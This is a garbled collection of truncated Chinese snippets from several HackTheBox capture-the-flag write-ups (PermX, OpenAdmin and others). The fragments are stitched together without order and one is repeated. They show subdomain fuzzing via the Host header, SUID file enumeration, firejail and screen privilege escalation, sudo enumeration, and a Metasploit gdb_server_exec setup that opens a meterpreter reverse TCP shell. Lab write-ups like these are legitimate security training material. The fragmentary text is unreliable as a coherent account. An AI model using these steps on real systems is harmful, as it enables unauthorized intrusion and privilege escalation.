Permx靶机笔记 概述 permx靶机是HTB的简单靶机,这台靶机整体考验渗透人员的信息搜集能力,可以说只有信息搜集的全面和快速,才能快速拿到它的flag。 整体是比较简单的靶机 靶机连接:https://app.hackthebox.com/machines/PermX 一、nmap扫描 1)端
"HOST: FUZZ.permx.htb" 表示在请求头中使用 HOST 字段进行虚拟主机头注入。FUZZ 是占位符,会被字典中的每个条目替换,从而进行子域名的测试。例如,字典中的 test 条目会使得请求头为 HOST: test.permx.htb。 然后测出了两个子域名,www 和 lms ,原来做靶场可以这样做,用 FOFA 用惯了一时间没转过来。 按上...
LING_X5创建的收藏夹LING_X5内容:HTB-Permx靶机讲解,如果您对当前收藏夹内容感兴趣点击“收藏”可转入个人收藏夹方便浏览
获得atlas权限后先写入下authorized_keys,不然登录的时候太麻烦了,生成公钥、私钥的命令:ssh-keygen -f id_rsa,r然后修改公钥名称并进行上传到/home/atlas/.ssh。 还记得上面执行find / -perm -4000 -type f 2>/dev/null发现的/usr/local/bin/firejail吗,这里就要使用这个来进行提权,在网上查找下相关的expliot...
find / -perm-4000-ls 2>/dev/null 发现supershell可以利用。 利用supershell成功读到了root.txt,成功获得了第二个flag。 总结: 这个靶机难度是中等难度,但是给我带来了很多的知识点,也学到了很多。靶机的操作流程就是信息收集,从端口扫描到目录枚举,漏洞利用主要是sql注入,文件上传及手工union查询bypasswaf和文件...
igvlkOTSSfkgsgwxzsGVH3QNMePjXmEu 截取用户注册数据包如下,修改username参数验证 Cookie 长度 利用Python 根据注册用户请求包编写脚本 import random import requests import string import urllib.parse for i in range(1,30): username = ''.join(random.choice(string.ascii_letters) for i in range(i)) da...
find = run(["/usr/bin/find", "/usr/src", "-perm", "-4000"], stdout=PIPE, stderr=DEVNULL, encoding="utf-8").stdout.split('\n')[:-1] chown = run(["cd /usr/src; /usr/bin/chown nobody:nobody *"], stderr=DEVNULL, shell=True) ...
find / -perm -u=s 2>/dev/null 发现熟悉的screen提权 screen提权语句 成功提权,拿到最终flag 思路二: 模块getshell exploit/multi/gdb/gdb_server_exec 模块 设置参数如下: set target 1 set payload linux/x64/meterpreter/reverse_tcp set rhosts 10.10.11.125 ...
joanna@openadmin:/$ sudo -l sudo -l sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted sudo: error initializing audit plugin sudoers_audit 传linpea到靶机发现有一个sudo特权的文件在/etc/sudoers.d/joanna 查看这个文件: joanna@openadmin:/$ cat /etc/sudoers.d/joanna cat /etc/...
find / -perm-4000-ls 2>/dev/null 发现supershell可以利用。 利用supershell成功读到了root.txt,成功获得了第二个flag。 总结: 这个靶机难度是中等难度,但是给我带来了很多的知识点,也学到了很多。靶机的操作流程就是信息收集,从端口扫描到目录枚举,漏洞利用主要是sql注入,文件上传及手工union查询bypasswaf和文件...